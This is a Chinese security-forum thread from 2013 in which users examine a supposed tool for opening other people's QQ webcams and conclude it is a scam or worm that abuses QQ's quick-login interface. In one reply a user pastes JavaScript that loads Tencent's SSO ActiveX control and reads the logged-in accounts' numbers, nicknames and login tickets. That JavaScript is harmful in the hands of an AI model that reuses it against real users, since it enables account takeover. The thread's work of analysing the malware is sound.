[讨论]据说知道QQ就可以就可以打开对方的摄像头-软件逆向-看雪-安全社区|安全招聘|kanxue.com

最新回复 (14)
山民雪币： 6324 活跃值： (3425) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 125 粉丝 1 关注私信	山民 2 楼要注册时，你用自己的QQ号吗？ 2013-10-9 11:25 0
黑色舞曲雪币： 1423 活跃值： (702) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 178 粉丝 0 关注私信	黑色舞曲 3 楼不是，那个填QQ的是要填写打开视频的人的QQ，不是本人的，我是从QQ随便查找了一个填写的 2013-10-9 11:29 0
elianmeng 雪币： 967 活跃值： (1138) 能力值： ( LV6，RANK：90 ) 在线值：发帖 68 回帖 707 粉丝 4 关注私信	elianmeng 1 4 楼手贱啊！人家sleep（2000）；呵呵 2013-10-9 11:58 0
backflip 雪币： 211 活跃值： (52) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 43 粉丝 0 关注私信	backflip 5 楼根本就没激活功能，那个消息框永远都是“检测失败”啊！ Kernel32.Sleep (2000) 坑爹吗该签名什么的应该是web的攻击，楼主抓下包看看就知道了～ 2013-10-9 12:33 0
虫子wq 雪币： 14 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 15 粉丝 0 关注私信	虫子wq 6 楼现在QQ好像有个快速登录的东西可以拦截到密码！不知道是不是真的！ 2013-10-9 12:52 0
黑色舞曲雪币： 1423 活跃值： (702) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 178 粉丝 0 关注私信	黑色舞曲 7 楼一开始就不相信这个软件的功能是真的，更不用说注册了，就是不明白咋把个性签名都改了，QQ不是有驱动保护吗 2013-10-9 12:54 0
bdxuelang 雪币： 110 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 14 粉丝 0 关注私信	bdxuelang 8 楼利用qq的快速登录接口做的。骗注册软件的 2013-10-9 13:23 0
zxqloveyou 雪币： 215 活跃值： (25) 能力值： ( LV3，RANK：20 ) 在线值：发帖 1 回帖 141 粉丝 0 关注私信	zxqloveyou 9 楼假的吧。 2013-10-9 13:57 0
backflip 雪币： 211 活跃值： (52) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 43 粉丝 0 关注私信	backflip 10 楼刚发现我的QQ签名也被改了！难道是用QQ游戏那种快速登录获取的密码么 2013-10-9 17:14 0
eremiter 雪币： 2 活跃值： (72) 能力值： ( LV2，RANK：10 ) 在线值：发帖 29 回帖 64 粉丝 0 关注私信	eremiter 11 楼怎么厉害 2013-10-9 23:20 0
backflip 雪币： 211 活跃值： (52) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 43 粉丝 0 关注私信	backflip 12 楼汗我以为能发现什么大漏洞的，不玩了 document.body.innerHTML = GetuinKey(); function GetuinKey() { var text = ""; var q_hummerQtrl = null; var g_vOptData = null; if (window.ActiveXObject) { try { q_hummerQtrl = new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2"); var A = q_hummerQtrl.CreateTXSSOData(); q_hummerQtrl.InitSSOFPTCtrl(0, A); g_vOptData = q_hummerQtrl.CreateTXSSOData(); var a = q_hummerQtrl.DoOperation(1, g_vOptData); var V = a.GetArray("PTALIST"); var f = V.GetSize(); var H = $("list_uin"); for (var g = 0; g < f; g++) { var E = V.GetData(g); var P = E.GetDWord("dwSSO_Account_dwAccountUin"); var U = E.GetStr("strSSO_Account_strNickName"); var G = E.GetBuf("bufST_PTLOGIN"); var A = G.GetSize(); var N = ""; for (var Y = 0; Y < A; Y++) { var B = G.GetAt(Y).toString("16"); if (B.length == 1) { B = "0" + B }; N += B }; text += P + '\|' + U + '\|' + N + ';' } } catch (b) {} }; return text }; 2013-10-10 09:31 0
黑色舞曲雪币： 1423 活跃值： (702) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 178 粉丝 0 关注私信	黑色舞曲 13 楼额，JS啊 2013-10-10 11:27 0
JoySauce 雪币： 341 活跃值： (85) 能力值： ( LV5，RANK：70 ) 在线值：发帖 6 回帖 185 粉丝 0 关注私信	JoySauce 1 14 楼这串JS干嘛使的呢 2013-10-10 18:48 0
yezhulove 雪币： 1787 活跃值： (340) 能力值： ( LV3，RANK：30 ) 在线值：发帖 12 回帖 303 粉丝 1 关注私信	yezhulove 15 楼 QQ蠕虫，利用快捷登录，获得权限，然后就会在群里散播自己。 2013-10-10 20:01 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

山民

雪币： 6324

活跃值： (3425)

能力值：

( LV2，RANK：10 )

在线值：

发帖

0

回帖

125

粉丝

1

关注

私信

山民: 2 楼

要注册时，你用自己的QQ号吗？

2013-10-9 11:25

0

黑色舞曲

雪币： 1423

活跃值： (702)

能力值：

( LV2，RANK：10 )

在线值：

发帖

7

回帖

178

粉丝

0

关注

私信

黑色舞曲: 3 楼

不是，那个填QQ的是要填写打开视频的人的QQ，不是本人的，我是从QQ随便查找了一个填写的

2013-10-9 11:29

0

elianmeng

雪币： 967

活跃值： (1138)

能力值：

( LV6，RANK：90 )

在线值：

发帖

68

回帖

707

粉丝

4

关注

私信

elianmeng 1: 4 楼

手贱啊！人家sleep（2000）；呵呵

2013-10-9 11:58

0

backflip

雪币： 211

活跃值： (52)

能力值：

( LV2，RANK：10 )

在线值：

发帖

2

回帖

43

粉丝

0

关注

私信

backflip: 5 楼

根本就没激活功能，那个消息框永远都是“检测失败”啊！

Kernel32.Sleep (2000) 坑爹吗

该签名什么的应该是web的攻击，楼主抓下包看看就知道了～

2013-10-9 12:33

0

虫子wq

雪币： 14

活跃值： (10)

能力值：

( LV2，RANK：10 )

在线值：

发帖

3

回帖

15

粉丝

0

关注

私信

虫子wq: 6 楼

现在QQ好像有个快速登录的东西可以拦截到密码！不知道是不是真的！

2013-10-9 12:52

0

黑色舞曲

雪币： 1423

活跃值： (702)

能力值：

( LV2，RANK：10 )

在线值：

发帖

7

回帖

178

粉丝

0

关注

私信

黑色舞曲: 7 楼

一开始就不相信这个软件的功能是真的，更不用说注册了，就是不明白咋把个性签名都改了，QQ不是有驱动保护吗

2013-10-9 12:54

0

bdxuelang

雪币： 110

活跃值： (10)

能力值：

( LV2，RANK：10 )

在线值：

发帖

3

回帖

14

粉丝

0

关注

私信

bdxuelang: 8 楼

利用qq的快速登录接口做的。骗注册软件的

2013-10-9 13:23

0

zxqloveyou

雪币： 215

活跃值： (25)

能力值：

( LV3，RANK：20 )

在线值：

发帖

1

回帖

141

粉丝

0

关注

私信

zxqloveyou: 9 楼

假的吧。

2013-10-9 13:57

0

backflip

雪币： 211

活跃值： (52)

能力值：

( LV2，RANK：10 )

在线值：

发帖

2

回帖

43

粉丝

0

关注

私信

backflip: 10 楼

刚发现我的QQ签名也被改了！难道是用QQ游戏那种快速登录获取的密码么

2013-10-9 17:14

0

eremiter

雪币： 2

活跃值： (72)

能力值：

( LV2，RANK：10 )

在线值：

发帖

29

回帖

64

粉丝

0

关注

私信

eremiter: 11 楼

怎么厉害

2013-10-9 23:20

0

backflip

雪币： 211

活跃值： (52)

能力值：

( LV2，RANK：10 )

在线值：

发帖

2

回帖

43

粉丝

0

关注

私信

backflip: 12 楼

汗我以为能发现什么大漏洞的，不玩了

document.body.innerHTML = GetuinKey();

function GetuinKey() {
    var text = "";
    var q_hummerQtrl = null;
    var g_vOptData = null;
    if (window.ActiveXObject) {
        try {
            q_hummerQtrl = new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");
            var A = q_hummerQtrl.CreateTXSSOData();
            q_hummerQtrl.InitSSOFPTCtrl(0, A);
            g_vOptData = q_hummerQtrl.CreateTXSSOData();
            var a = q_hummerQtrl.DoOperation(1, g_vOptData);
            var V = a.GetArray("PTALIST");
            var f = V.GetSize();
            var H = $("list_uin");
            for (var g = 0; g < f; g++) {
                var E = V.GetData(g);
                var P = E.GetDWord("dwSSO_Account_dwAccountUin");
                var U = E.GetStr("strSSO_Account_strNickName");
                var G = E.GetBuf("bufST_PTLOGIN");
                var A = G.GetSize();
                var N = "";
                for (var Y = 0; Y < A; Y++) {
                    var B = G.GetAt(Y).toString("16");
                    if (B.length == 1) {
                        B = "0" + B
                    };
                    N += B
                };
                text += P + '|' + U + '|' + N + ';'
            }
        } catch (b) {}
    };
    return text
};

2013-10-10 09:31

0